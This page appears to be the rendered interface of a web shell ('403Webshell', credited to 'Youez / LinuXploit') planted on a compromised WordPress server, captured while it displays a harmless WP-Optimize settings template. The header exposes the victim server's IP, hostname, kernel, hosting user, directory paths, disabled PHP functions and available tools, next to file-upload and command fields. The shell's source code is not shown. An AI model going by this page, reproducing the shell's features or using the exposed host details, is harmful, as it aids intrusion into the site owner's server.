403Webshell
Server IP : 194.61.116.167  /  Your IP : 216.73.217.84
Web Server : Apache/2
System : Linux nimbus2000.evosiber.com 5.14.0-503.11.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 12 09:26:13 EST 2024 x86_64
User : evoplastik ( 1130)
PHP Version : 8.1.34
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/evoplastik/public_html/wp-content/plugins/wp-optimize/templates/database/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/evoplastik/public_html/wp-content/plugins/wp-optimize/templates/database/settings-general.php
<?php if (!defined('WPO_VERSION')) die('No direct access allowed'); ?>

<h3 class="wpo-first-child"><?php esc_html_e('General settings', 'wp-optimize'); ?></h3>
<div class="wpo-fieldgroup">
	<p>
		<?php esc_html_e('Whether manually or on a schedule, these settings apply whenever a relevant optimization is run.', 'wp-optimize'); ?>
	</p>
	<p>
		<input name="enable-retention" id="enable-retention" type="checkbox" value="true" <?php checked($retention_enabled); ?>>
		<?php
		echo '<label for="enable-retention">';
		printf(
			// translators: %s is number of weeks
			esc_html__('Keep last %s weeks data', 'wp-optimize'),
			'</label><input id="retention-period" name="retention-period" type="number" step="1" min="2" max="99" value="' . esc_attr($retention_period) . '"><label for="enable-retention">'
		);
		echo '</label>';
		?>
		<br>
		<small><?php echo esc_html__('This option will, where relevant, retain data from the chosen period, and remove any garbage data before that period.', 'wp-optimize') . ' ' . esc_html__('If the option is not active, then all garbage data will be removed.', 'wp-optimize') . ' ' . esc_html__('This will also affect Auto Clean-up process', 'wp-optimize'); ?></small>
	</p>
	<p>
		<input name="enable-revisions-retention" id="enable-revisions-retention" type="checkbox" value="true" <?php checked($revisions_retention_enabled); ?>>
		<?php
		echo '<label for="enable-revisions-retention">';
		printf(
			// translators: %s is number of revisions to keep
			esc_html__('Always keep %s post revisions', 'wp-optimize'),
			'</label><input id="revisions-retention-count" name="revisions-retention-count" type="number" step="1" min="2" max="99" value="' . esc_attr($revisions_retention_count) . '"><label for="revisions-retention-count">'
		);
		echo '</label>';
		?>
		<br>
		<small><?php echo esc_html__('This option will retain specified number of post revisions, and remove other revisions.', 'wp-optimize') . ' ' . esc_html__('If the option is not active, then all garbage data will be removed.', 'wp-optimize') . ' ' . esc_html__('This will also affect Auto Clean-up process', 'wp-optimize'); ?></small>
	</p>
	<?php WP_Optimize()->include_template('take-a-backup.php', false, array('label' => __('Take a backup with UpdraftPlus before running scheduled optimizations', 'wp-optimize'), 'checkbox_name' => 'enable-auto-backup-scheduled')); ?>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit